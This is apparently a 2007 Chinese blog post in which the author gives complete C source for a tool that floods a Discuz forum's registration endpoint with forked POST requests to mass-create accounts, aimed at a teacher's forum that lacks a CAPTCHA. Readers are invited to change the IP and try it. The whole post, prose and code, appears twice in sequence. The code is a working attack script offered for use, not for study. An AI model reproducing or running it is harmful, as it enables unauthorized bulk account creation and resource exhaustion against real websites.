一个简单的暴力注册Discuz论坛帐户的小代码。
时间:2007-04-18 来源:souldemo
昨天偶尔扫描一下,发现老师新做了个BBS. 是asp.net的(Discuz).
便上去注册了几下,发现没有什么验证码或者激活这类的防暴力注册的方法。
便写了这段小代码。可惜随度太慢。
但用于交流目的还是有一定帮助的。
如果谁喜欢,可以修改一下ip地址,拿回去试试。呵呵!不过速度很慢,
因为用不了多久服务器就会通告窗口大小为0.或许应该降低速度,反而
是服务器响应速度越快,注册的就越快。
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <errno.h>
#include <limits.h>
void err_quit(const char* fmt, ...);
void err_msg(const char* fmt, ...);
void err_do(const char* fmt, va_list ap);
char *ltoa(long long val, char *buf, unsigned radix);
int main(int argc, char **argv)
{
int sockfd;
int serverport;
struct sockaddr_in servaddr;
ssize_t len;
socklen_t addrlen;
struct sockaddr *sa;
struct sockaddr_in *sin;
int n;
int m;
pid_t pid;
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sockfd < 0)
err_quit("socket failed!\n");
memset(&servaddr, 0, sizeof(struct sockaddr_in));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(80);
/** change server's IP here **/
inet_pton(AF_INET, "10.0.191.189", &servaddr.sin_addr);
n = connect(sockfd, (struct sockaddr*)&servaddr, sizeof(struct sockaddr_in));
if (n < 0)
perror("connect failed!\n");
for (m = 1; m < 10; ++m) {
if ((pid = fork()) < 0) {
err_quit("fork failed!\n");
}
else if (pid == 0) { /** child **/
int size = 0;
char *str = "POST /register.aspx?agree=1&createuser=1 HTTP/1.1\r\n\
Host: 10.0.191.189\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 1.1.4322)\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,\
image/png,*/*;q=0.5\r\nAccept-Language: zh-cn,zh;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: http://10.0.191.189/register.aspx?agree=yes\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length:345";
char *body1 = "\r\n\r\nusername=";
char *body2 = "&password=111111&password2=111111&email=sfsf%40163.com&submit=%E5%88%9B%E5%BB\
%BA%E7%94%A8%E6%88%B7&question=0&answer=&gender=0&nickname=&bday_y=&bday_m=&bd\
ay_d=&location=&msn=&yahoo=&skype=&icq=&qq=&homepage=&bio=&templateid=0&tpp=0&p\
pp=0&newpm=radiobutton&pmsound=1&showemail=1&newsletter=1&invisible=0&signature=\
&sigstatus=1\r\n\r\n";
char seqstr[30];
char sizebuf[4];
char sendbuf[BUFSIZ];
char recvbuf[BUFSIZ*4];
long long int base = 10000;
long long int seq;
int bits =1;
shutdown(sockfd, SHUT_RD);
for (; bits < 10; ++bits) {
for (seq = base *m; seq < base * (m + 1); ++seq) {
len = strlen(str);
strncpy(sendbuf, str, len);
ltoa(seq, seqstr, 10);
#ifdef DEBUG
printf("seq number %s\n", seqstr);
#endif
size = 335 + strlen(seqstr);
ltoa(size, sizebuf, 10);
strncpy(sendbuf+len-3, sizebuf, 3);
#ifdef DEBUG
printf("send : %s\t %d bytes\n", sendbuf, size);
#endif
strncpy(sendbuf+len, body1, strlen(body1));
len += strlen(body1);
strncpy(sendbuf+len, seqstr, strlen(seqstr));
len += strlen(seqstr);
strncpy(sendbuf+len, body2, strlen(body2));
len += strlen(body2);
#ifdef DEBUG
printf("\n%s\n", sendbuf);
#endif
n = send(sockfd, sendbuf, len, 0);
/** you should remove all the incomeing data **/
recv(sockfd, recvbuf, BUFSIZ*4, 0);
#ifdef DEBUG
printf("\n%s\n", recvbuf);
// sleep(5);
#endif
}
seq *= 10;
}
}
}
pause();
}
char *ltoa(long long val, char *buf, unsigned radix)
{
char *p; /** pointer to traverse string **/
char *firstdig; /** pointer to first digit **/
char temp; /** temp char **/
unsigned long long digval; /** value of digit **/
p = buf;
if (val<0) {
/** negative, so output '-' and negate **/
*p++ = '-';
val = (unsigned long long)(-(long long)val);
}
firstdig = p; /** save pointer to first digit **/
do {
digval = (unsigned long long) (val % radix);
val /= radix; /** get next digit **/
/** convert to ascii and store **/
if (digval > 9)
*p++ = (char) (digval - 10 + 'a'); /** a letter **/
else
*p++ = (char) (digval + '0'); /** a digit **/
} while (val > 0);
/** We now have the digit of the number in the buffer,
* but in reverse order. Thus we reverse them now
**/
*p-- = '\0'; /** terminate string; p points to last digit **/
do {
temp = *p;
*p = *firstdig;
*firstdig = temp; /** swap *p and *firstdig **/
--p;
++firstdig; /** advance to next two digits **/
} while (firstdig < p); /** repeat until halfway **/
return buf;
}
void err_quit(const char* fmt, ...)
{
va_list ap;
va_start(ap, fmt);
err_do(fmt,ap);
va_end(ap);
exit(1);
}
void err_msg(const char* fmt, ...)
{
va_list ap;
va_start(ap, fmt);
err_do(fmt,ap);
va_end(ap);
}
void err_do(const char* fmt, va_list ap)
{
int save, n;
char buf[BUFSIZ+1];
save = errno;
/** some systems haven't got vsnprintf, but this isn't a problem on popular platforms **/
vsnprintf(buf, BUFSIZ, fmt, ap);
n = strlen(buf);
snprintf(buf+n, BUFSIZ-n, ": %s", strerror(save));
strcat(buf,"\n");
fputs(buf, stderr);
fflush(stderr);
return;
}
便上去注册了几下,发现没有什么验证码或者激活这类的防暴力注册的方法。
便写了这段小代码。可惜随度太慢。
但用于交流目的还是有一定帮助的。
如果谁喜欢,可以修改一下ip地址,拿回去试试。呵呵!不过速度很慢,
因为用不了多久服务器就会通告窗口大小为0.或许应该降低速度,反而
是服务器响应速度越快,注册的就越快。
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <errno.h>
#include <limits.h>
void err_quit(const char* fmt, ...);
void err_msg(const char* fmt, ...);
void err_do(const char* fmt, va_list ap);
char *ltoa(long long val, char *buf, unsigned radix);
int main(int argc, char **argv)
{
int sockfd;
int serverport;
struct sockaddr_in servaddr;
ssize_t len;
socklen_t addrlen;
struct sockaddr *sa;
struct sockaddr_in *sin;
int n;
int m;
pid_t pid;
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sockfd < 0)
err_quit("socket failed!\n");
memset(&servaddr, 0, sizeof(struct sockaddr_in));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(80);
/** change server's IP here **/
inet_pton(AF_INET, "10.0.191.189", &servaddr.sin_addr);
n = connect(sockfd, (struct sockaddr*)&servaddr, sizeof(struct sockaddr_in));
if (n < 0)
perror("connect failed!\n");
for (m = 1; m < 10; ++m) {
if ((pid = fork()) < 0) {
err_quit("fork failed!\n");
}
else if (pid == 0) { /** child **/
int size = 0;
char *str = "POST /register.aspx?agree=1&createuser=1 HTTP/1.1\r\n\
Host: 10.0.191.189\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 1.1.4322)\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,\
image/png,*/*;q=0.5\r\nAccept-Language: zh-cn,zh;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: http://10.0.191.189/register.aspx?agree=yes\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length:345";
char *body1 = "\r\n\r\nusername=";
char *body2 = "&password=111111&password2=111111&email=sfsf%40163.com&submit=%E5%88%9B%E5%BB\
%BA%E7%94%A8%E6%88%B7&question=0&answer=&gender=0&nickname=&bday_y=&bday_m=&bd\
ay_d=&location=&msn=&yahoo=&skype=&icq=&qq=&homepage=&bio=&templateid=0&tpp=0&p\
pp=0&newpm=radiobutton&pmsound=1&showemail=1&newsletter=1&invisible=0&signature=\
&sigstatus=1\r\n\r\n";
char seqstr[30];
char sizebuf[4];
char sendbuf[BUFSIZ];
char recvbuf[BUFSIZ*4];
long long int base = 10000;
long long int seq;
int bits =1;
shutdown(sockfd, SHUT_RD);
for (; bits < 10; ++bits) {
for (seq = base *m; seq < base * (m + 1); ++seq) {
len = strlen(str);
strncpy(sendbuf, str, len);
ltoa(seq, seqstr, 10);
#ifdef DEBUG
printf("seq number %s\n", seqstr);
#endif
size = 335 + strlen(seqstr);
ltoa(size, sizebuf, 10);
strncpy(sendbuf+len-3, sizebuf, 3);
#ifdef DEBUG
printf("send : %s\t %d bytes\n", sendbuf, size);
#endif
strncpy(sendbuf+len, body1, strlen(body1));
len += strlen(body1);
strncpy(sendbuf+len, seqstr, strlen(seqstr));
len += strlen(seqstr);
strncpy(sendbuf+len, body2, strlen(body2));
len += strlen(body2);
#ifdef DEBUG
printf("\n%s\n", sendbuf);
#endif
n = send(sockfd, sendbuf, len, 0);
/** you should remove all the incomeing data **/
recv(sockfd, recvbuf, BUFSIZ*4, 0);
#ifdef DEBUG
printf("\n%s\n", recvbuf);
// sleep(5);
#endif
}
seq *= 10;
}
}
}
pause();
}
char *ltoa(long long val, char *buf, unsigned radix)
{
char *p; /** pointer to traverse string **/
char *firstdig; /** pointer to first digit **/
char temp; /** temp char **/
unsigned long long digval; /** value of digit **/
p = buf;
if (val<0) {
/** negative, so output '-' and negate **/
*p++ = '-';
val = (unsigned long long)(-(long long)val);
}
firstdig = p; /** save pointer to first digit **/
do {
digval = (unsigned long long) (val % radix);
val /= radix; /** get next digit **/
/** convert to ascii and store **/
if (digval > 9)
*p++ = (char) (digval - 10 + 'a'); /** a letter **/
else
*p++ = (char) (digval + '0'); /** a digit **/
} while (val > 0);
/** We now have the digit of the number in the buffer,
* but in reverse order. Thus we reverse them now
**/
*p-- = '\0'; /** terminate string; p points to last digit **/
do {
temp = *p;
*p = *firstdig;
*firstdig = temp; /** swap *p and *firstdig **/
--p;
++firstdig; /** advance to next two digits **/
} while (firstdig < p); /** repeat until halfway **/
return buf;
}
void err_quit(const char* fmt, ...)
{
va_list ap;
va_start(ap, fmt);
err_do(fmt,ap);
va_end(ap);
exit(1);
}
void err_msg(const char* fmt, ...)
{
va_list ap;
va_start(ap, fmt);
err_do(fmt,ap);
va_end(ap);
}
void err_do(const char* fmt, va_list ap)
{
int save, n;
char buf[BUFSIZ+1];
save = errno;
/** some systems haven't got vsnprintf, but this isn't a problem on popular platforms **/
vsnprintf(buf, BUFSIZ, fmt, ap);
n = strlen(buf);
snprintf(buf+n, BUFSIZ-n, ": %s", strerror(save));
strcat(buf,"\n");
fputs(buf, stderr);
fflush(stderr);
return;
}
相关阅读 更多 +
